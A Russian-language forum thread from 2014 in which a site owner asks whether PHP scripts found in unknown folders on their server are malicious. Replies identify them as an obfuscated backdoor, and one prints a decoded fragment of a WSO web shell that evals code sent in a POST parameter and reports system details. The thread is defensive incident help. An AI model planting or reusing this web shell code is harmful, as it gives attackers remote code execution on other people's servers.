scream Posted October 2, 2014 · Report post Здравствуйте! Походу меня взломали! Сегодня чисто случайно у себя на сервере в каталоге где расположен сайт обнаружил какие то левые папки и внутри этих папок по два скрипта php. Так как в php я не разбираюсь выкладываю содержимое этих двух скриптов одной из папок! Подскажите пожалуйста по исходному коду вредоносный он или нет. Заранее спасибо! .9a476f.php page.php Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
Abram Posted October 2, 2014 · Report post Разбирать это долго, но судя по обсуфикации - банальный зловред. Залили скорее всего через дырку в вашем движке. Ну да. http://www.unphp.net/decode/150e76a7959a10e963594936048a363a/ Выполняет любой PHP-код из переменной $_POST['p1']. По сути - простенький backdoor, через который вам скорее всего залили уже что-то более весёлое. Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
scream Posted October 3, 2014 · Report post Разбирать это долго, но судя по обсуфикации - банальный зловред. Залили скорее всего через дырку в вашем движке. Ну да. http://www.unphp.net/decode/150e76a7959a10e963594936048a363a/ Выполняет любой PHP-код из переменной $_POST['p1']. По сути - простенький backdoor, через который вам скорее всего залили уже что-то более весёлое. Спасибо! Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...
terrible Posted October 6, 2014 · Report post baсkdoor 100%, небольшой отрезок кода, переведённого в читабельный вид: function actionRC(){ if(!@$_POST["p1"]) { $ugtfpiyrum="a"; $GLOBALS["vrvweypznipu"]=array("uname"=>php_uname(),"php_version"=>phpversion(),"wso_version"=>WSO_VERSION,"safemode"=>@ini_get("safe_mode")); echo serialize(${$ugtfpiyrum}); } else { eval($_POST["p1"]); } } if(!empty($_POST["a"])&&function_exists("action".$_POST["a"]))call_user_func("action".$_POST["a"]); exit; Вставить ник Quote Ответить с цитированием Share this post Link to post Share on other sites More sharing options...